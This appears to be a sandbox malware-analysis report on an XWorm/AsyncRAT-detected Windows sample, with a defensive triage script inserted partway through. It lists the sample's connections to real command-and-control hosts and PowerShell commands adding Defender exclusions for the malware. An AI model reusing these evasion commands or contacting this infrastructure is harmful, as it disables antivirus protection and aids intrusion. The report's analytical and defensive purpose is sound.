                                          Oct 7, 2024 04:51:21.389656067 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:21.674385071 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:21.676737070 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:51:21.681740046 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:33.790405035 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:51:33.796087027 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:34.080888987 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:34.085484028 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:51:34.090873957 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:38.569938898 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:38.618012905 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:51:46.196469069 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:51:46.508691072 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:51:47.118091106 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:51:47.184578896 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:47.184619904 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:47.184648037 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:47.469232082 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:47.470727921 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:51:47.475624084 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:58.602705002 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:51:58.607865095 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:58.893126011 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:51:58.895796061 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:51:58.900866985 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:52:07.836986065 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:52:07.842036963 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:52:08.174793959 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:52:08.175607920 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Oct 7, 2024 04:52:08.180569887 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:52:08.576282978 CEST | 55624 | 49738 | 147.185.221.18 | 192.168.2.4
                                          Oct 7, 2024 04:52:08.617929935 CEST | 49738 | 55624 | 192.168.2.4 | 147.185.221.18
                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Oct 7, 2024 04:50:55.413964987 CEST | 57693 | 53 | 192.168.2.4 | 1.1.1.1
                                          Oct 7, 2024 04:50:55.456665993 CEST | 53 | 57693 | 1.1.1.1 | 192.168.2.4
                                          Oct 7, 2024 04:50:56.392735004 CEST | 52414 | 53 | 192.168.2.4 | 1.1.1.1
                                          Oct 7, 2024 04:50:56.410598993 CEST | 53 | 52414 | 1.1.1.1 | 192.168.2.4
                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                          Oct 7, 2024 04:50:55.413964987 CEST | 192.168.2.4 | 1.1.1.1 | 0x7309 | Standard query (0) | ser0xen.com | A (IP address) | IN (0x0001) | false
                                          Oct 7, 2024 04:50:56.392735004 CEST | 192.168.2.4 | 1.1.1.1 | 0xb36f | Standard query (0) | models-subscriptions.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                          Oct 7, 2024 04:50:55.456665993 CEST | 1.1.1.1 | 192.168.2.4 | 0x7309 | No error (0) | ser0xen.com | | 18.224.107.108 | A (IP address) | IN (0x0001) | false
                                          Oct 7, 2024 04:50:56.410598993 CEST | 1.1.1.1 | 192.168.2.4 | 0xb36f | No error (0) | models-subscriptions.gl.at.ply.gg | | 147.185.221.18 | A (IP address) | IN (0x0001) | false
                                          • ser0xen.com
                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          0 | 192.168.2.4 | 49737 | 18.224.107.108 | 443 | 6444 | C:\Users\user\Desktop\1c8DbXc5r0.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-10-07 02:50:56 UTC | 67 | OUT | GET /pl.txt HTTP/1.1
                                              Host: ser0xen.com
                                              Connection: Keep-Alive
                                          2024-10-07 02:50:56 UTC | 282 | IN | HTTP/1.1 200 OK
                                              Date: Mon, 07 Oct 2024 02:50:56 GMT
                                              Server: Apache/2.4.59 (Amazon Linux) OpenSSL/3.0.8
                                              Last-Modified: Sat, 21 Sep 2024 02:03:17 GMT
                                              ETag: "28-622978f27bc18"
                                              Accept-Ranges: bytes
                                              Content-Length: 40
                                              Connection: close
                                              Content-Type: text/plain; charset=UTF-8
                                          2024-10-07 02:50:56 UTC | 40 | IN | Data Raw: 6d 6f 64 65 6c 73 2d 73 75 62 73 63 72 69 70 74 69 6f 6e 73 2e 67 6c 2e 61 74 2e 70 6c 79 2e 67 67 3a 35 35 36 32 34 0a
                                              Data Ascii: models-subscriptions.gl.at.ply.gg:55624

                                          Target ID:0
                                          Start time:22:49:57
                                          Start date:06/10/2024
                                          Path:C:\Users\user\Desktop\1c8DbXc5r0.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\1c8DbXc5r0.exe"
                                          Imagebase:0x8d0000
                                          File size:39'424 bytes
                                          MD5 hash:49AA60A3EE7D3B03D16AA591024CBBC7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2916872836.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1665971860.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1665971860.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                          Reputation:low
                                          Has exited:false

                                          Target ID:1
                                          Start time:22:50:00
                                          Start date:06/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\1c8DbXc5r0.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:2
                                          Start time:22:50:00
                                          Start date:06/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:22:50:07
                                          Start date:06/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1c8DbXc5r0.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:22:50:07
                                          Start date:06/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:22:50:16
                                          Start date:06/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\rapent.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:22:50:16
                                          Start date:06/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:11
                                          Start time:22:50:30
                                          Start date:06/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rapent.exe'
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:12
                                          Start time:22:50:30
                                          Start date:06/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                            Execution Graph

                                            Execution Coverage:19.7%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:6
                                            Total number of Limit Nodes:0
                                            execution_graph 6332 7ffd9b8836ed 6333 7ffd9b88371f RtlSetProcessIsCritical 6332->6333 6335 7ffd9b8837d2 6333->6335 6336 7ffd9b883c18 6337 7ffd9b883c21 SetWindowsHookExW 6336->6337 6339 7ffd9b883cf1 6337->6339

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2958982516.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_1c8DbXc5r0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 83f0102cf19333d6d41f15b1cb0a0a6d46bed5fa315c001b805348696e78ea90
                                            • Instruction ID: 42baef55bc51152026baaf8145967f901dcef2062a24cfae1429b5b6dd5eb513
                                            • Opcode Fuzzy Hash: 83f0102cf19333d6d41f15b1cb0a0a6d46bed5fa315c001b805348696e78ea90
                                            • Instruction Fuzzy Hash: 98828220B1D91E4BEBA8FBA88465AB972D2FF98704F514579D02EC32D7DD38EC428741

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2958982516.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_1c8DbXc5r0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CAO_^
                                            • API String ID: 0-3111533842
                                            • Opcode ID: 270cdd523515708f39f5dbbdb8458d85fb5c4092357b10cc6d144693b7e44e25
                                            • Instruction ID: 2df71c0836f7fbbe41eb9f2d588b590aea6e821b19b0b781260f37b5c3c7a1c0
                                            • Opcode Fuzzy Hash: 270cdd523515708f39f5dbbdb8458d85fb5c4092357b10cc6d144693b7e44e25
                                            • Instruction Fuzzy Hash: D112E730B2DA094FE7A8FB7C886967976D2EF9C714F450579E41EC32D6DE38A8418341

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2958982516.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_1c8DbXc5r0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1f839def58c29df77174eba96530f805d3b21d7b82263498b162aae956018a16
                                            • Instruction ID: cef5e98b1a1243586ebe56b1c1f2920123188bbc7feaad29c0730345d9800ea8
                                            • Opcode Fuzzy Hash: 1f839def58c29df77174eba96530f805d3b21d7b82263498b162aae956018a16
                                            • Instruction Fuzzy Hash: 6AF1A330A09E4E8FEBA8DF28C8557E977D1FF58310F14426EE85DC7295DB34A9418B82

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2958982516.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_1c8DbXc5r0.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7012afe59fa6a96d138ce410610c7201eab09f97a753d3ab92b4df3143111d30
                                            • Instruction ID: 5de8071c371f2c8b3acf46c715a67981e1d365efa6941c180ee570bab198a3ca
                                            • Opcode Fuzzy Hash: 7012afe59fa6a96d138ce410610c7201eab09f97a753d3ab92b4df3143111d30
                                            • Instruction Fuzzy Hash: A6E1C430A0DE4E8FEBA8DF28C8657E977D1EF58310F14426ED85DC7295DE38A9418B81

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 447 7ffd9b8836ed-7ffd9b8837d0 RtlSetProcessIsCritical 451 7ffd9b8837d2 447->451 452 7ffd9b8837d8-7ffd9b88380d 447->452 451->452
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2958982516.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_1c8DbXc5r0.jbxd
                                            Similarity
                                            • API ID: CriticalProcess
                                            • String ID:
                                            • API String ID: 2695349919-0
                                            • Opcode ID: 75b7f4bf2435d7a843dbf739536fce874304201d640e90c915f6836c4f69418f
                                            • Instruction ID: db7cae302d6915b5bbd3b90d9231e4c39e23f026f6b822c5fc7be7a194b58c49
                                            • Opcode Fuzzy Hash: 75b7f4bf2435d7a843dbf739536fce874304201d640e90c915f6836c4f69418f
                                            • Instruction Fuzzy Hash: 3E41F23190C6488FDB19DFA8D855AE9BBF0EF5A311F04416EE09AC3592CB74A846CB91
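The function above (API ID: CriticalProcess, in the sample's own process, snapshot hcaresult_0_2) calls RtlSetProcessIsCritical, which sets the process's BreakOnTermination flag so that terminating it bugchecks the machine; this is the behaviour the report summarises as "Protects its processes via BreakOnTermination flag". As an added triage check that is not part of the Joe Sandbox report, the PowerShell below queries the same flag back out of every process on a suspected host through NtQueryInformationProcess with the ProcessBreakOnTermination class (value 29) and lists the processes that have it set. It assumes an elevated shell on Windows; processes it cannot open (protected processes, access denied) are skipped rather than reported, and the class constant, access mask and P/Invoke wrapper are written here, not taken from the sample.

```powershell
# Added triage check (not code from the report or the sample): list processes whose
# BreakOnTermination flag is set, i.e. processes that called RtlSetProcessIsCritical
# or NtSetInformationProcess(ProcessBreakOnTermination). Run from an elevated shell.

$src = @"
using System;
using System.Runtime.InteropServices;
public static class NtProc {
    [DllImport("ntdll.dll")]
    public static extern int NtQueryInformationProcess(
        IntPtr ProcessHandle, int ProcessInformationClass,
        ref uint ProcessInformation, int ProcessInformationLength, ref int ReturnLength);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr hObject);
}
"@
Add-Type -TypeDefinition $src

$ProcessBreakOnTermination = 29        # PROCESSINFOCLASS value; the information is a 4-byte ULONG
$PROCESS_QUERY_INFORMATION = 0x0400    # access right needed to query this class

function Get-CriticalProcess {
    foreach ($p in Get-Process) {
        $h = [NtProc]::OpenProcess($PROCESS_QUERY_INFORMATION, $false, $p.Id)
        if ($h -eq [IntPtr]::Zero) { continue }   # protected process or access denied: skipped, not reported
        try {
            [uint32]$flag = 0
            [int]$returned = 0
            $status = [NtProc]::NtQueryInformationProcess($h, $ProcessBreakOnTermination, [ref]$flag, 4, [ref]$returned)
            if ($status -eq 0 -and $flag -ne 0) {      # STATUS_SUCCESS and flag set
                [pscustomobject]@{
                    Pid  = $p.Id
                    Name = $p.ProcessName
                    Path = $p.Path                    # $null when the image path is not readable
                }
            }
        }
        finally {
            [void][NtProc]::CloseHandle($h)
        }
    }
}

Get-CriticalProcess | Sort-Object Name | Format-Table -AutoSize
```

A few Windows system processes (smss.exe, csrss.exe, wininit.exe among them) are legitimately critical, so compare the output against a clean baseline rather than treating every hit as malicious; a critical process whose image lives under a user profile, or that is launched from the Startup folder as this report describes, is the pattern worth acting on. Because a critical process cannot be killed without a bugcheck, clear the flag first (NtSetInformationProcess with the same class and a zero value, from a tool with SeDebugPrivilege) or collect evidence and reboot, rather than calling Stop-Process on it.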

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 454 7ffd9b883c18-7ffd9b883c1f 455 7ffd9b883c21-7ffd9b883c29 454->455 456 7ffd9b883c2a-7ffd9b883c9d 454->456 455->456 460 7ffd9b883ca3-7ffd9b883cb0 456->460 461 7ffd9b883d29-7ffd9b883d2d 456->461 462 7ffd9b883cb2-7ffd9b883cef SetWindowsHookExW 460->462 461->462 464 7ffd9b883cf1 462->464 465 7ffd9b883cf7-7ffd9b883d28 462->465 464->465
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2958982516.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd9b880000_1c8DbXc5r0.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: a4518096efc9fbe4123936f983591781c10e65df4bb7ad6f0a15d27313c04662
                                            • Instruction ID: 23969a83b8568444f9279204753558591156d34a4c75f27ba4a05b3c6f7c31f8
                                            • Opcode Fuzzy Hash: a4518096efc9fbe4123936f983591781c10e65df4bb7ad6f0a15d27313c04662
                                            • Instruction Fuzzy Hash: 5741F630A0CA5D8FDB5CDF6C98566F9BBE1EF59321F00027EE019D3292DE74A8528781
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1761191567.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c347f3aec162f2ccd526f0d17f309894dc4aef1fc1246160a297e2e2b2319e77
                                            • Instruction ID: d2531fdc3543b0d81c1feabfb73cbced4a513ec6941173761eadd8c040d69b08
                                            • Opcode Fuzzy Hash: c347f3aec162f2ccd526f0d17f309894dc4aef1fc1246160a297e2e2b2319e77
                                            • Instruction Fuzzy Hash: E9D14732A1FB8D2FEB65EBA848A55B57BE1EF56310B0901FED45CC70E3D918A905C341
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1760639154.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 32be23b6dc6bebcec90c6c1ced66e155f55b2a4323d557b6a529c957a36b2ffe
                                            • Instruction ID: 6b9655508a1ad72153d6b700aee77608677220579115bcf159361336a9bfc8de
                                            • Opcode Fuzzy Hash: 32be23b6dc6bebcec90c6c1ced66e155f55b2a4323d557b6a529c957a36b2ffe
                                            • Instruction Fuzzy Hash: 4071B163F0FA9A5BE7156BADEC7A0E83760EF11768F0901B3C4D84B0A3FD1425174691
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1760639154.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d8b14e435aad75243bcffdfbed94a59f1fbb99f9e98fc5f77d6d3bb908eda61
                                            • Instruction ID: 2d2fe8915815afe2ee041bd2e66abe5e7ba112c3ae25a596bff4038ea8200378
                                            • Opcode Fuzzy Hash: 8d8b14e435aad75243bcffdfbed94a59f1fbb99f9e98fc5f77d6d3bb908eda61
                                            • Instruction Fuzzy Hash: 14410871A0DA488FDF589F5C984A6A87BE1FB98310F04812FE449C3292DB30B955CBC2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1760057812.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b78d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a524793753baba04c3422a58d7c2b43aa4d3d039fdcbdc0aeaa3dd6be60694e6
                                            • Instruction ID: 087fc7f02fe012a22155c8249fabc510754d641bd48d39b6e48a7113302f5537
                                            • Opcode Fuzzy Hash: a524793753baba04c3422a58d7c2b43aa4d3d039fdcbdc0aeaa3dd6be60694e6
                                            • Instruction Fuzzy Hash: BC41127040EBC84FE7668B2898919523FF0EF52321B1606EFD088CB1B3D725A846C792
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1760639154.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b3181a80cdfa23f5e99ad50e558da003caa425f026b529f602ebb8926643d5fa
                                            • Instruction ID: fdf6291d84aef1aae81012d305398eab3741c6cc7b09049e918e915166eabc83
                                            • Opcode Fuzzy Hash: b3181a80cdfa23f5e99ad50e558da003caa425f026b529f602ebb8926643d5fa
                                            • Instruction Fuzzy Hash: D6210A3190C74C8FDB59DFAC984A7E97FF0EB9A321F04416BD448C3166DA74941ACB91
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1760639154.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                            • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                            • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1761191567.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e75462891ee533c043e2536d094e1fd2b73abbd26b182e048917eba41044534
                                            • Instruction ID: d59f6d2cc57cde007c2ab7b89b3b23dfdb36d19f3d24cbf38712af748639aebd
                                            • Opcode Fuzzy Hash: 5e75462891ee533c043e2536d094e1fd2b73abbd26b182e048917eba41044534
                                            • Instruction Fuzzy Hash: EBF0BE32B1E9098FD768EA5CE4919A873E4EF6533071600BAE06DC76B3CA25EC40C745
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1761191567.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0d3cb44cc6b2f7d559073430bc9a556b6d8b55ad96fd1d1a8e08f419d2e853f
                                            • Instruction ID: 3b30d820f02e4b631d5352e540c60fd939eb15341b3f21a83df3593ba4ee3d9a
                                            • Opcode Fuzzy Hash: a0d3cb44cc6b2f7d559073430bc9a556b6d8b55ad96fd1d1a8e08f419d2e853f
                                            • Instruction Fuzzy Hash: D8F05E32A0E5498FD768EA5CE4A19A877E0FF4532475600BAE15DCB5B3DA25AC40C750
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1761191567.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                            • Instruction ID: 664ee9e526855705bcffdcfcbd412457206555aceccb5f816b9e306c4c7c1cf4
                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                            • Instruction Fuzzy Hash: 43E0123171C4089FD678EA4CE0919AD73E5EBA833171241BBD14EC7672CA21ED518B85
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1760639154.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: L_^4$L_^7$L_^F$L_^J
                                            • API String ID: 0-3225005683
                                            • Opcode ID: 094baacac4173d964dd07137b5425fa9e43bff048cc2dba61da4707fa992f5a4
                                            • Instruction ID: 45c46be07a9f83af549c3a923de6fc2add619ee1d317f12e50de848940673ccf
                                            • Opcode Fuzzy Hash: 094baacac4173d964dd07137b5425fa9e43bff048cc2dba61da4707fa992f5a4
                                            • Instruction Fuzzy Hash: E721D4B77085259ED30A7BBDBC199ED3740CB9427834552B3D2A98B093EA1460878AE0
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1849146869.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d8c45826e7374cbec9469c53be0f2b02813a13aa4cbcc1ad0798ebe535f8ad14
